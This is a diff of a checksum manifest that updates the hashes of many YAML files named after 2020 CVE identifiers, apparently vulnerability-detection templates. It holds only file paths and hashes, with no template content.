-http/cves/2020/CVE-2020-11930.yaml:8b8f216e625fa6793d5917e265c1a4f647638c1e +http/cves/2020/CVE-2020-11798.yaml:e75d51bcef364c3acb447c319f13e79f41bdb048 +http/cves/2020/CVE-2020-11853.yaml:11e7d1b397255247a3f6cc730eb1a76227c0d1c8 +http/cves/2020/CVE-2020-11854.yaml:f89e85246085dbf7fac0ee54f942f66d464876a2 +http/cves/2020/CVE-2020-11930.yaml:c8ba45cc1546f0c19e34517aefe5db9a1871e38c http/cves/2020/CVE-2020-11978.yaml:b40478456746a978305b9baace251c063914f4b4 -http/cves/2020/CVE-2020-11991.yaml:1f5a1ffe53688a0fc0bc2abfbd118dc0ee43c9e4 -http/cves/2020/CVE-2020-12054.yaml:f22e794835d7ef6c3d520624e7a5a7b28d1359b7 +http/cves/2020/CVE-2020-11991.yaml:15d9e424a0a0dd4dbdb12c7513e604d619d785cc +http/cves/2020/CVE-2020-12054.yaml:0070b25e98d08e793d3cbbbcff6770692d34fd0d http/cves/2020/CVE-2020-12116.yaml:e8e63c03ae8898dd630b6610429f6d86aff3add4 -http/cves/2020/CVE-2020-12127.yaml:dfc2ac7933295deeb524f6946e0e3bdb876ef653 -http/cves/2020/CVE-2020-12256.yaml:4a7fee67cb8cb67fc02561c50dcdd9b9ae099eb7 +http/cves/2020/CVE-2020-12127.yaml:62d1db696f180fc17700f5f6baa133350506299f +http/cves/2020/CVE-2020-12256.yaml:af6ca729bd006d29325355664d34aa15c66d5c06 http/cves/2020/CVE-2020-12259.yaml:f77c099ec9f18b2bbe3df65fa4a343b2f5923cf2 -http/cves/2020/CVE-2020-12447.yaml:c8de4b2ca3eea7fa73796b5d17f97800ded11a8f -http/cves/2020/CVE-2020-12478.yaml:7f0bf579020df67f665e2843093eeb54c7f19ce0 -http/cves/2020/CVE-2020-12720.yaml:4d15881e452306175de342af05a98488f61ac817 +http/cves/2020/CVE-2020-12447.yaml:d4bba2f2e7db61aa6c78c3a9908ec2e641d15ba1 +http/cves/2020/CVE-2020-12478.yaml:2a6423bfaafa7666842c21d19986354b0e10ae6b +http/cves/2020/CVE-2020-12720.yaml:42bc4f7db3bbaa493d1014582316223a0d26f43f http/cves/2020/CVE-2020-12800.yaml:e50502c683b6f9373dca94f7d902161a3c43b490 -http/cves/2020/CVE-2020-13117.yaml:581986c29992c011e51f2759ab024dd2b7494056 -http/cves/2020/CVE-2020-13121.yaml:e9b4c69c89260a7d126b6b550e51baef5245c157 -http/cves/2020/CVE-2020-13158.yaml:93a0f714a67be95fb28cbf95d73e9ccd7ab01221 +http/cves/2020/CVE-2020-13117.yaml:6555945b79abc89651a0568ac9bc01cd0459c679 +http/cves/2020/CVE-2020-13121.yaml:d3900639bc6f9a789dcb28087934bd9d326b9cac +http/cves/2020/CVE-2020-13158.yaml:c444b99184a8f58a431ccd1d46de8627b642486b http/cves/2020/CVE-2020-13167.yaml:83148b2047628f44f4ca6bb170d8bee2ee62b656 -http/cves/2020/CVE-2020-13258.yaml:4319f461593073c7c25f28c5d7b6c5431b94414d -http/cves/2020/CVE-2020-13379.yaml:e2a7f905fc5afeda0b52b9ad8a9b91dc6407832e -http/cves/2020/CVE-2020-13405.yaml:f4b119e2bde0a37849c0db2ac60c1c8eae30ec5f -http/cves/2020/CVE-2020-13483.yaml:783b97d2085fbbf7e4505a6ac8a128c126e5f0d3 -http/cves/2020/CVE-2020-13638.yaml:ee703a06000f8ea411d0f7ae5778b1b302c7549b -http/cves/2020/CVE-2020-13700.yaml:9661a935e3f68da38c601060d5a7e17bb8cbcbfa -http/cves/2020/CVE-2020-13820.yaml:3e55b4cc9d8844568cf3e11ca8739679b5362d53 -http/cves/2020/CVE-2020-13851.yaml:34ba2f62db6df390e4b7fd918fc6758e1327d9f6 +http/cves/2020/CVE-2020-13258.yaml:b95c4beacaaa5f7c909d480e8a74b503ba58c420 +http/cves/2020/CVE-2020-13379.yaml:97cbd52993f4aaf70186772b9407cf94003024fb +http/cves/2020/CVE-2020-13405.yaml:7f3f735af3e24d0e6fc449ef403fd86efc83bd81 +http/cves/2020/CVE-2020-13483.yaml:74cb40fe66c8ddf81146182712cb87bb4d1fa683 +http/cves/2020/CVE-2020-13638.yaml:eebcccfc9742f57a943d22670be2dd66a06f6166 +http/cves/2020/CVE-2020-13700.yaml:ea767c87ccdd326922d84aef7ac56fe8e9107205 +http/cves/2020/CVE-2020-13820.yaml:f751b0167ecd4c2a52043db569d60837937511a0 +http/cves/2020/CVE-2020-13851.yaml:f51ce07b475ad1f5303f56a7e424b8cdd0d018c8 http/cves/2020/CVE-2020-13927.yaml:67c237c3cef696cdd04c7d1f7f170e01615a93fd -http/cves/2020/CVE-2020-13937.yaml:22a3930a4af52b84427387c22a7aef70ba5991ea +http/cves/2020/CVE-2020-13937.yaml:7f61968ac64dbb26ec783138389d5d12c2660469 http/cves/2020/CVE-2020-13942.yaml:98259fa7e8124878a67f15c5d330ab5c12ded6a9 -http/cves/2020/CVE-2020-13945.yaml:7ff0ddaf1a0e2abdc845d2f08afb1aba8168fdc0 -http/cves/2020/CVE-2020-14092.yaml:ba422c56d08226e051ac02d210e83233036f0aed -http/cves/2020/CVE-2020-14144.yaml:5b306d6a6872c9202962d7fe9f1b508815de6cc2 -http/cves/2020/CVE-2020-14179.yaml:3a34c56bdd57bac9a5c509409db65c914f48bf16 -http/cves/2020/CVE-2020-14181.yaml:5a943c7a23bab46795ccb5f724e9bdf9e46cfc85 -http/cves/2020/CVE-2020-14408.yaml:66fa60e1bb86fc21729c3a4b6fe5d78ab01d3725 -http/cves/2020/CVE-2020-14413.yaml:12b2777eed719e1bf4ba70c9853f7844fd79fefe +http/cves/2020/CVE-2020-13945.yaml:ea261cbdb43c6b832e36e50205ca48e94ff3b91b +http/cves/2020/CVE-2020-14092.yaml:1007a79681bde17644941dbbdedde4964f5407ea +http/cves/2020/CVE-2020-14144.yaml:a72dcc9b41456a9188dccd0b040a44185656ce55 +http/cves/2020/CVE-2020-14179.yaml:2a9650ed6ea25fb71890868aedddb619ce500144 +http/cves/2020/CVE-2020-14181.yaml:0fe276c8bf17ddd4886dca029c3cd731189dee55 +http/cves/2020/CVE-2020-14408.yaml:0fa0c6014e65e2b819824f86deaecff246f18679 +http/cves/2020/CVE-2020-14413.yaml:e3701764dc24019c309b61345553e3d85766d26c http/cves/2020/CVE-2020-14750.yaml:416ad3daa80469c8c0f84539d9bfe9a2e649fcab -http/cves/2020/CVE-2020-14864.yaml:6fe3e18691d8cb9314b13f7d6505008d74b579f9 +http/cves/2020/CVE-2020-14864.yaml:7f2fbef7feca06d5fbf97a0ed43a73a3d8742645 http/cves/2020/CVE-2020-14882.yaml:75bbfc11c2928d9fbad52a4302f67eb912435b4d http/cves/2020/CVE-2020-14883.yaml:2ec44d8e3d0b7042fbb4afe4118a872b7f6ab7a4 -http/cves/2020/CVE-2020-15050.yaml:60c2a536575bc04bbe9df90ab3f6f5fe0459bdd9 -http/cves/2020/CVE-2020-15129.yaml:7ba97dcf3cef5222f2c1d7045cc89a733a09263c -http/cves/2020/CVE-2020-15148.yaml:90c0a55d46eff10549ca26b59ba75010fb2ecdf9 +http/cves/2020/CVE-2020-15050.yaml:802cf660554af23f37e3f4f216b85f348c44ad1c +http/cves/2020/CVE-2020-15129.yaml:bc330936ba6774d1f84c96062d6ffbdf2cd9cfb2 +http/cves/2020/CVE-2020-15148.yaml:d1ac47dc8c72749951cdf58c0078f4b3adb5a9c4 http/cves/2020/CVE-2020-15227.yaml:7efaa8e60493e38f58afddfb17826bad19551b53 -http/cves/2020/CVE-2020-15500.yaml:a94d2aacbad244733621e93a94cb4b3694deebae -http/cves/2020/CVE-2020-15505.yaml:dff6553a11aee0d377710b2672a7c51c96dad6c9 +http/cves/2020/CVE-2020-15500.yaml:5f7e7e356eb574e12c471151c66f74cd30416902 +http/cves/2020/CVE-2020-15505.yaml:c8a7c7ee133ca4103ce9f19e6764ffd16a1a998d http/cves/2020/CVE-2020-15568.yaml:e65a946b833c4aa1dfcd3a3ee1e0f7abe36cdb80 -http/cves/2020/CVE-2020-15867.yaml:18322318f47c28816ffc37ea9e4bebb15913e185 -http/cves/2020/CVE-2020-15895.yaml:de54389eec7bca1ff585ca94199d8f64b5b79706 +http/cves/2020/CVE-2020-15867.yaml:b576d2948e928e79cf2fa7561e765005074ebf95 +http/cves/2020/CVE-2020-15895.yaml:105fd5919bf03aa79f4b043e016120bfd876fed2 http/cves/2020/CVE-2020-15920.yaml:46aaa5d519f4feb32bb872443fdb9ad2f19bf597 -http/cves/2020/CVE-2020-16139.yaml:56afa4dd6a1ff3e3d5c3d05abf1f26bb5ca01acd +http/cves/2020/CVE-2020-16139.yaml:817d64b290f6ce91c44be3880f6ce1368f681c2e http/cves/2020/CVE-2020-16846.yaml:c5e01368bfc4f7d5a60555e3f2aa58d64968a5a5 -http/cves/2020/CVE-2020-16952.yaml:854c11a76ada49a0abfce2378cbcf02b51a6f9cf -http/cves/2020/CVE-2020-17362.yaml:0e502b8f2952121533a44aff63b92b4db38ef7b4 -http/cves/2020/CVE-2020-17453.yaml:a14b2a9ed3169ac0b0ace8c79c7ea20af4fd3590 -http/cves/2020/CVE-2020-17456.yaml:7142644c5959758fc3867e7c0afe2ed9874e7944 -http/cves/2020/CVE-2020-17463.yaml:0f45b028b714c60436464d1fdef8869786855171 +http/cves/2020/CVE-2020-16952.yaml:3d159d4fee6e3714e1be5e6893abb01387f2cd8d +http/cves/2020/CVE-2020-17362.yaml:301817b61d91461c06404fd3f57fd2218bc62503 +http/cves/2020/CVE-2020-17453.yaml:eaee329b3b765e2fc457dcb83b95e022f71dbce8 +http/cves/2020/CVE-2020-17456.yaml:5e0f942157aae6b03e0be9818f7fca0b97fa0034 +http/cves/2020/CVE-2020-17463.yaml:fb3050e55093e930680c2e2b01af274cef6ef08f http/cves/2020/CVE-2020-17496.yaml:dc34c9df5ec51a26289c176e26be035dc37b6a40 -http/cves/2020/CVE-2020-17505.yaml:e4a72fc4391e1ad4f179450107e7b6d335e8ef6a -http/cves/2020/CVE-2020-17506.yaml:2d618940b7758cb1490dd78df0b98729260ae8be -http/cves/2020/CVE-2020-17518.yaml:4b68702482a2c19293db43bc67d94256b1537962 +http/cves/2020/CVE-2020-17505.yaml:86ee5675d3f5cf9496702f03a6b1825b7094a272 +http/cves/2020/CVE-2020-17506.yaml:699ba478397c6dacc904230d3e5bc7d9a42cef0f +http/cves/2020/CVE-2020-17518.yaml:9c62a775f09223c28354b8d931665e4e81e23824 http/cves/2020/CVE-2020-17519.yaml:c046016078374c126b13e98b33d8df42d80442ce -http/cves/2020/CVE-2020-17526.yaml:59653998be18d2d370bd3c60ac61df1675876847 -http/cves/2020/CVE-2020-17530.yaml:99565ad00ffa10037ce9657e0b9c364ba64fbb04 -http/cves/2020/CVE-2020-18268.yaml:504c8e2c07d00dbb694415b655688188f3772461 -http/cves/2020/CVE-2020-19282.yaml:3311b62bb830c9cf5364c02cbead8692d38ab82d -http/cves/2020/CVE-2020-19283.yaml:49b8f16862ebed5bf0003b8cdd8272dc1cf7c9f7 -http/cves/2020/CVE-2020-19295.yaml:e76a39287954876fe0a22f82b844a83f6efc10f5 -http/cves/2020/CVE-2020-19360.yaml:8222b994f7c3a0368f72cff1d7ad9c9e167bea54 +http/cves/2020/CVE-2020-17526.yaml:10a531743b6e8d82f9dcc725199ea2c345f630fb +http/cves/2020/CVE-2020-17530.yaml:d5fe880554057bdc20b9c336573ef232ec057a4a +http/cves/2020/CVE-2020-18268.yaml:f572049026d0cc083c04a0ce8d8cca882bd206ed +http/cves/2020/CVE-2020-19282.yaml:88693b668c437af8bc0cd04c6f9ac8e72d97b559 +http/cves/2020/CVE-2020-19283.yaml:d1098b12d12b771322941fb01bbfbecf888fc972 +http/cves/2020/CVE-2020-19295.yaml:20e665747346bcd7b45f17a0038d99e17fa3a1da +http/cves/2020/CVE-2020-19360.yaml:4274f0b7a543a1645d255cb94b7804924bd4b625 http/cves/2020/CVE-2020-1943.yaml:e5519635e10fa69f665cea2ed4fbc58d43d2fce9 -http/cves/2020/CVE-2020-19515.yaml:90f1c1aad9dfe62e30e05284326a6a8117779268 -http/cves/2020/CVE-2020-1956.yaml:43ae9ae431eb35e1b44b8d08dfe4ef9777890301 -http/cves/2020/CVE-2020-19625.yaml:bfb13a91a1f59eb35204a6a7b4cdb10ba3f9bc75 -http/cves/2020/CVE-2020-20285.yaml:9aaccce5fc5d7a2bcb2c564461eb7cff0c4f9093 -http/cves/2020/CVE-2020-20300.yaml:e6d7c4d451489e995b13722677c5a087176518f6 -http/cves/2020/CVE-2020-2036.yaml:b80d29e1131b03b8bd1b9baffc702b23adc374a0 +http/cves/2020/CVE-2020-19515.yaml:2bc4b9f38835141cb0775771fa2f1454e1d8824f +http/cves/2020/CVE-2020-1956.yaml:c3f3ebbab2b6ee6572adf91c0b11d14ede9f4f63 +http/cves/2020/CVE-2020-19625.yaml:cab3d92fbc35e043b7602d7601083c0e9adc150a +http/cves/2020/CVE-2020-20285.yaml:5f27c5f8c084aa2576443d6ebe9d195a08c4071d +http/cves/2020/CVE-2020-20300.yaml:92d4c08d3a024b09bda99434f0fed1f73211ab46 +http/cves/2020/CVE-2020-2036.yaml:f21e6137a681a3d236a347934a754d6343dfe187 http/cves/2020/CVE-2020-2096.yaml:b8ce7607c4994bf5d834a3ae59643f91e56e94bb -http/cves/2020/CVE-2020-20982.yaml:c30acc718c6c02a8f81491a01b5a617da03dcacd -http/cves/2020/CVE-2020-20988.yaml:bbfe91935c4cb18cb28b36fc7b70c44804f415b2 -http/cves/2020/CVE-2020-21012.yaml:d3cfd90f38a4a0346fbc941e17d23d58cde64c14 -http/cves/2020/CVE-2020-2103.yaml:5c89179215e9d8333093eeb463f418897f5c7ccf -http/cves/2020/CVE-2020-21224.yaml:7b5911a6ddad770b2cde14d3889801cbeb97a93d -http/cves/2020/CVE-2020-2140.yaml:76da9674f05fe12f6063e1ab65f8921ca489c2bb -http/cves/2020/CVE-2020-22208.yaml:4eeed57574226a7a9616a350c2780ff26ea87836 -http/cves/2020/CVE-2020-22209.yaml:7b30ff4f556bdb3b5c2519ad89380853c759e64c -http/cves/2020/CVE-2020-22210.yaml:daff6fe8aa0c07a7629b5150e74dfe2050a3db14 -http/cves/2020/CVE-2020-22211.yaml:baf94758c05f4729526315c8b119417b2b594c48 -http/cves/2020/CVE-2020-22840.yaml:c8a3c6463a7bda5a1eb2f203ba18992c9229fa2a -http/cves/2020/CVE-2020-23015.yaml:cde7e01aeb236d328e97564a3e013b26dff8cb60 -http/cves/2020/CVE-2020-23517.yaml:144868fe30c240d9cb57a4642a836e8112d3c523 -http/cves/2020/CVE-2020-23575.yaml:8a4d405f20856483059894d6f975c03a50ae428a -http/cves/2020/CVE-2020-23697.yaml:952a183bd1ae83d74188c899dfcb038519d59df4 -http/cves/2020/CVE-2020-23972.yaml:2049c1139d7ebac54ab0c2b6c4a266dd2b6a31bb -http/cves/2020/CVE-2020-24148.yaml:af467d447581927b0255063ba359fbf4466e2956 +http/cves/2020/CVE-2020-20982.yaml:af649392407284a6cb2775632dfd387c4fde6e2b +http/cves/2020/CVE-2020-20988.yaml:b14f3ec829782a25325c078952324920cfd10758 +http/cves/2020/CVE-2020-21012.yaml:802523fa877b1c1eb2247629f03ecae00fc78bef +http/cves/2020/CVE-2020-2103.yaml:f5b9dc9b44d4a080c331c1d319d350a8c7a24cde +http/cves/2020/CVE-2020-21224.yaml:d98e6649aa22901714066b1b683204e852efc279 +http/cves/2020/CVE-2020-2140.yaml:f12164c9a0e1bb7a118d28aec691270067e56041 +http/cves/2020/CVE-2020-22208.yaml:154a0c3b44df4973bce28649c74dda11fa585ef5 +http/cves/2020/CVE-2020-22209.yaml:97c8fe1972c2fc4fd84c254000e49c7322046c59 +http/cves/2020/CVE-2020-22210.yaml:07af2a59b4898e4fcec63bb06c1eab82dc78c895 +http/cves/2020/CVE-2020-22211.yaml:d12cabf8fb817bd96d30e7972e3cda85ebc0ea52 +http/cves/2020/CVE-2020-22840.yaml:7009f77662fcc4d8dbe8b948d0eeef1a12f8561c +http/cves/2020/CVE-2020-23015.yaml:5ab21e36315a08e81d2e73d248661eb318d25ecf +http/cves/2020/CVE-2020-23517.yaml:ea3357d9c951bb37726646c824ab22a5c954d9d7 +http/cves/2020/CVE-2020-23575.yaml:3f01d4c23cbedb697371639c800a1f917f76b971 +http/cves/2020/CVE-2020-23697.yaml:18bf43f9c11a3c97619de71bfbd70d53a58d3e98 +http/cves/2020/CVE-2020-23972.yaml:2fdb7ea15b450b6d9490c41fab91b0298a8ddf83 +http/cves/2020/CVE-2020-24148.yaml:27ba602d4480d7c06758d381a66658e43c3cd534 http/cves/2020/CVE-2020-24186.yaml:e041f962dc31a09de8b8cf87865899adaa59a3cb -http/cves/2020/CVE-2020-24223.yaml:9c1c1b2138b8caeb345c7b132005265188e784b8 -http/cves/2020/CVE-2020-24312.yaml:1fd3b937839be8bb20de6aa545167985e681e7a9 -http/cves/2020/CVE-2020-24391.yaml:883834f2ab14d3c99cda8d7c5cd566d7ae9f67fb -http/cves/2020/CVE-2020-24550.yaml:8132c0821ec844e37fa5e53b41a8d1f24a6eb1bb -http/cves/2020/CVE-2020-24571.yaml:d3b897c1d34534a6a7aa2b58417da9c65b34f951 -http/cves/2020/CVE-2020-24579.yaml:54c8e393d9b9d4909905c0145d3e2065ae4a3c3d -http/cves/2020/CVE-2020-24589.yaml:895056aba48d171fb807fbe1e485fa89fbfe6003 -http/cves/2020/CVE-2020-24902.yaml:01ceafc3f0af1b74607cd6deae56426680cc23e7 -http/cves/2020/CVE-2020-24903.yaml:6abeb46fffae65b9a25900a0fc7f60ea4f84de4a -http/cves/2020/CVE-2020-24912.yaml:eabdc22c58d0318a74f3e058e3c6a32f37e65870 +http/cves/2020/CVE-2020-24223.yaml:8ec71fb8cef7f0f8a48a54783f2363570ed6dc7d +http/cves/2020/CVE-2020-24312.yaml:01521ad63a4505e3b692a9a369a0617bc17e3764 +http/cves/2020/CVE-2020-24391.yaml:b63e4b714cccc60057336ec0d96e517b4d6cbdf2 +http/cves/2020/CVE-2020-24550.yaml:f3a0ab2aa89ca612b94bef4298aa3e2c44737703 +http/cves/2020/CVE-2020-24571.yaml:a301d14e85acfbd26ce11c5ae1dc8bb4752cd4cc +http/cves/2020/CVE-2020-24579.yaml:019641e2aa26563cfd43aa2994ff892b878a056c +http/cves/2020/CVE-2020-24589.yaml:29cb45c7aa193d60f9451248d16a2e018349a2f3 +http/cves/2020/CVE-2020-24902.yaml:cb9d02dc69de2c171d8b6e8a5907af51ed6a0a18 +http/cves/2020/CVE-2020-24903.yaml:f393e1e4d2e6d59aea9ddeb5e545185dd58fd274 +http/cves/2020/CVE-2020-24912.yaml:269f9abcde26d83470fad60d7a12460302bdea65 http/cves/2020/CVE-2020-24949.yaml:bb1edd259c53a7ecde312b22a57cf92643170fc2 -http/cves/2020/CVE-2020-25078.yaml:1466cb6a6de786fccca1ef350ae8040b6f8b3db7 -http/cves/2020/CVE-2020-25213.yaml:0d9e74056ab69f6db0ad8f542791d6cdd4cafbcf +http/cves/2020/CVE-2020-25078.yaml:baef407a30b0c89d0034c2b3d7ac5030c4cd5606 +http/cves/2020/CVE-2020-25213.yaml:fb8635d10959e712cfca7cc14d8609319c4b0fa5 http/cves/2020/CVE-2020-25223.yaml:d99eb728c56a70fbda5d81e87a6da50d29bd4d3c -http/cves/2020/CVE-2020-25495.yaml:fb5e783f79fc226a386847e162f95cfb95cc6cfc +http/cves/2020/CVE-2020-25495.yaml:9455b4b520531b3e7742c763c9cfe1ff40b8cebd http/cves/2020/CVE-2020-25506.yaml:330ccaade80db6feb99c51b9e5794332c7e06236 http/cves/2020/CVE-2020-2551.yaml:c810a2e2d026f58b1982ce0506a2982214fb5247 -http/cves/2020/CVE-2020-25540.yaml:68a2eb884b8e3f522a55b5034a8b44edc51809dc -http/cves/2020/CVE-2020-25780.yaml:4ead5ec585f1d8e941bd10b95f9f243a9343c37a -http/cves/2020/CVE-2020-25864.yaml:636581ee57231156e913fa875e79d2a0d32ad480 +http/cves/2020/CVE-2020-25540.yaml:6970156e650f36c05a1986a4c03c0751110ec439 +http/cves/2020/CVE-2020-25780.yaml:efc52c784c870d5c6a21b1b84d8094a3761110d2 +http/cves/2020/CVE-2020-25864.yaml:ce9d6d9b8cc417f784e0dc95bf6ded03fbef34b1 http/cves/2020/CVE-2020-26073.yaml:c2480acfdbe2cb79eb9677736948078368b67f54 -http/cves/2020/CVE-2020-26153.yaml:cb7833fabf1f36adb87b04ff9ac3e1f277dc23bc -http/cves/2020/CVE-2020-26214.yaml:cb5d0ddd2791bd4ea3102a36f667463d314147e6 +http/cves/2020/CVE-2020-26153.yaml:4d079e6ac0f77e0c9ab59ba114916f38a5332796 +http/cves/2020/CVE-2020-26214.yaml:22e0bff72bf58bc4fd7581cd6ce7e9f6cc4fec95 http/cves/2020/CVE-2020-26217.yaml:bfc01bf7d9a86f439c6f00153d209c145bcf864d -http/cves/2020/CVE-2020-26248.yaml:e4afa9ff6a8844481b87153b06ed1421f93524ac +http/cves/2020/CVE-2020-26248.yaml:72136c2c9c9c0733c485aee3d22d9e61dd9c230f http/cves/2020/CVE-2020-26258.yaml:4ab18177159095e4762c60c8792db8d7541fad9d -http/cves/2020/CVE-2020-26413.yaml:ced45b7e5a6f3fce6af46f4989111c7a314d3fb6 -http/cves/2020/CVE-2020-26876.yaml:651ed46d3cb316ce0b05f748142093d4f9f81fa3 -http/cves/2020/CVE-2020-26919.yaml:6295bf36a4d4c86f1d2c6da3e3c6e5933d4c454f -http/cves/2020/CVE-2020-26948.yaml:1df46ee342e50ccfa94b23f7031bf0f74653c035 -http/cves/2020/CVE-2020-27191.yaml:763a08fa3dc31eb78bd484a0c60a46de85d51b02 -http/cves/2020/CVE-2020-2733.yaml:91fc43174e18d075bde17e193449042ec7b7a672 -http/cves/2020/CVE-2020-27361.yaml:781ff6e1b43d3e1b9fd192be245a32e209352ad8 -http/cves/2020/CVE-2020-27467.yaml:5fc9290d7d2aa1e8ef9b1945ee26b7fa0484b409 -http/cves/2020/CVE-2020-27481.yaml:c1bd329f6d47397f7b3c95f1a31f10db1e9c7152 -http/cves/2020/CVE-2020-27735.yaml:ace2c10f98f8f4ed1346c0640afb89bb4f3e3905 -http/cves/2020/CVE-2020-27866.yaml:299079d9f743bf36f3628736dde34754535cce2f -http/cves/2020/CVE-2020-27982.yaml:4a9b51721cf4462c3f9cf62f895112a565addb19 -http/cves/2020/CVE-2020-27986.yaml:b39a1bd5ada90b86ffae6f5a9ec7a344af1092e3 -http/cves/2020/CVE-2020-28185.yaml:27b6a0501a2c2864adb18a5e8642c4b22d0feeeb +http/cves/2020/CVE-2020-26413.yaml:b21d90ba85cfb477ebb6ebddb8eb01a52cb89d47 +http/cves/2020/CVE-2020-26876.yaml:be81a9ad955b499188ae41c1422732f4ce6f97a4 +http/cves/2020/CVE-2020-26919.yaml:19b5a0e9baec7cf608ad65cdd55944e733df23db +http/cves/2020/CVE-2020-26948.yaml:22bc65a730f18c608f9ea218b8f2982da66614bc +http/cves/2020/CVE-2020-27191.yaml:c6def7dfe15869f3329caa3871e181af054ad5f1 +http/cves/2020/CVE-2020-2733.yaml:53ab117dd87ee65abeb170467942445bc1cea4f1 +http/cves/2020/CVE-2020-27361.yaml:1c6b2fc271c0daffcf70b07276036bfd2f031ab8 +http/cves/2020/CVE-2020-27467.yaml:ad3004626cba9030ba6ce5be61c71cef3fbed571 +http/cves/2020/CVE-2020-27481.yaml:8a3f8715d77cb02b98b9a2a7d2219fb58b3d3157 +http/cves/2020/CVE-2020-27735.yaml:2010c9c4339e2e06a3923f15f73197243584c906 +http/cves/2020/CVE-2020-27866.yaml:3292f24267cdaf5f01e3c08f35f12236c43dcda5 +http/cves/2020/CVE-2020-27982.yaml:fa32b39368d92a7719b8703819f16e5ac23d5a7a +http/cves/2020/CVE-2020-27986.yaml:002676c416718383fb11d5c04bc87d1081ae5730 +http/cves/2020/CVE-2020-28185.yaml:e798affdcf148716ba5314fd6938d1dd99473567 http/cves/2020/CVE-2020-28188.yaml:5e8e013b799caa85226fbc26cf351da22e128bdd -http/cves/2020/CVE-2020-28208.yaml:e126ea88cec8ac9d82add1356f72bd860c7e0628 -http/cves/2020/CVE-2020-28351.yaml:7b2915d708f17a302d2911faad02b1379a4955d8 +http/cves/2020/CVE-2020-28208.yaml:18d6b9912ab5189d92181568d5d9eafd1d29809b +http/cves/2020/CVE-2020-28351.yaml:b6126deeb23067ad91ccaa27a8badf4f1c247e44 http/cves/2020/CVE-2020-28871.yaml:4d0ed6db359e4f3bff1e2279960e784c0c657780 -http/cves/2020/CVE-2020-28976.yaml:18f51eed88f2e706bd98b83bd962589eb9a1bf2f -http/cves/2020/CVE-2020-29164.yaml:8311691d2f46cb70616e35d804924fd5e8c8d2c1 -http/cves/2020/CVE-2020-29227.yaml:14cf4717292c67661074e81243c20fffaf0933a5 -http/cves/2020/CVE-2020-29284.yaml:35da04899a9398f9ab4584631d1110340ec24d8d -http/cves/2020/CVE-2020-29395.yaml:3ed07f8312567c8a563a11258aeff0d1b35593cd -http/cves/2020/CVE-2020-29453.yaml:9adb6d4835888cf42080357dfbe3e0fa2993f1a9 +http/cves/2020/CVE-2020-28976.yaml:65034fbfab02f9775d46fe027b0488b57824390e +http/cves/2020/CVE-2020-29164.yaml:f4c52ff95ec2094dc99d1da053bd2f96174bff35 +http/cves/2020/CVE-2020-29227.yaml:385f5ae6647e5a067373f881db61c08d31527a4b +http/cves/2020/CVE-2020-29284.yaml:a0435e31d68f86266a8ae31205ebf079b8d40fea +http/cves/2020/CVE-2020-29395.yaml:91fb72ab90ef65d6edec278f06f397345d742f19 +http/cves/2020/CVE-2020-29453.yaml:1055a3e0582a2806306d802e17722e3b644a4698 http/cves/2020/CVE-2020-29583.yaml:8f8c2e2a7918d035abf99677b8adcb360d1fc5cf -http/cves/2020/CVE-2020-29597.yaml:4bf45cb14e3f8d4c667fb32075050ca4628bdf8f +http/cves/2020/CVE-2020-29597.yaml:88bb6d8930731cd87180729c1044928e7ed82fdb http/cves/2020/CVE-2020-3187.yaml:5da31b4fe1070f9e03ba7fb2ffd481217ebfdb9b -http/cves/2020/CVE-2020-3452.yaml:85be4162c6622315f7d983c2dc170790159b23d6 -http/cves/2020/CVE-2020-35234.yaml:3ee1f761481d979f9ba406020369847f32d326c0 -http/cves/2020/CVE-2020-35338.yaml:f35f6ca3d682328c38a0624d3ebc2bd4ef8b118f -http/cves/2020/CVE-2020-35476.yaml:7fa16ee649fc5b2127498037a70f7572a04825b1 -http/cves/2020/CVE-2020-35489.yaml:1de0f175b60c8b841a34ee84fba17de614d24e0a -http/cves/2020/CVE-2020-35580.yaml:2941b958e327dcdbb8bd2ce075a94d46d2050c19 -http/cves/2020/CVE-2020-35598.yaml:6392bd1d8e38efade51b7c917a033f1df7d0f5ac -http/cves/2020/CVE-2020-35713.yaml:92b8ee49089e0fd92bfd208eeacd188d4dd8be73 -http/cves/2020/CVE-2020-35729.yaml:c5fe426a5672b65b7d6b3a3023f1979d950c53b7 -http/cves/2020/CVE-2020-35736.yaml:c2f9ea35464f4e9343c1ee10a270d011ae5be0c1 -http/cves/2020/CVE-2020-35749.yaml:0a7c5fa5ebcb4834859a4478515ed9074c402c55 -http/cves/2020/CVE-2020-35774.yaml:7632f1d2634c885b77a39a31875d6f5109fb28ee -http/cves/2020/CVE-2020-3580.yaml:1a94da10350b17b548c855dec9be491dc2980a28 -http/cves/2020/CVE-2020-35846.yaml:3b1791b3deaa3b953fe86d3cd54836cb0b888df6 -http/cves/2020/CVE-2020-35847.yaml:b971e5aa204851ea867abbb38f563cc7d474c4d4 -http/cves/2020/CVE-2020-35848.yaml:625d3a8e5b3bc2bfaa0ee3c2304f3466965ba09a -http/cves/2020/CVE-2020-35951.yaml:a251e9b5a16ffabbd245fbd36adef1f794f0659b -http/cves/2020/CVE-2020-35984.yaml:b48c3c4d96ecbb9636c8b27d11b40dd9f45ec6bb -http/cves/2020/CVE-2020-35985.yaml:65c371391d0b444278472c69b5a7c776ce5504ec -http/cves/2020/CVE-2020-35986.yaml:0f84e88522d906ca42a3d201d39b16e3b0e60759 -http/cves/2020/CVE-2020-35987.yaml:a8bf01eefd7c55d073c0cb66563ce9a128c9eeea -http/cves/2020/CVE-2020-36112.yaml:5c70440c14b0711f22e494609208c75f7c2246c4 -http/cves/2020/CVE-2020-36289.yaml:2705e3a3509fcf9686055fcdc842142a7f6ab60c -http/cves/2020/CVE-2020-36365.yaml:da684466870c9e3c7e719aa2fc43aa06476e5a01 -http/cves/2020/CVE-2020-36510.yaml:feb531d7da9e05af7f1dcfcc7acca4eb077b016f -http/cves/2020/CVE-2020-4463.yaml:749e8b381c971aac5e416b19e2a9b6fea830b695 -http/cves/2020/CVE-2020-5191.yaml:2679ade8b7d857b23577ceb98a282ed238ebc77d -http/cves/2020/CVE-2020-5192.yaml:129a03282a2a9a146065c234ae3e68482d6b3b56 -http/cves/2020/CVE-2020-5284.yaml:e78e2d9f62cbf5169b88803dc4c3242d263b4e93 -http/cves/2020/CVE-2020-5307.yaml:2a4d76250626ede0535bb76ce0bae70025b92545 -http/cves/2020/CVE-2020-5405.yaml:ce7ff3c726cec47ffd5a8bff3eebb07446d6d23e -http/cves/2020/CVE-2020-5410.yaml:796fbaca41c42006a25589dd92f5c4f376381cfa -http/cves/2020/CVE-2020-5412.yaml:dad587910e2a8bdc0e88ed108965717e29f8f2c1 -http/cves/2020/CVE-2020-5775.yaml:58ad9b58762c02e2016f7b7b79880cd5d951de70 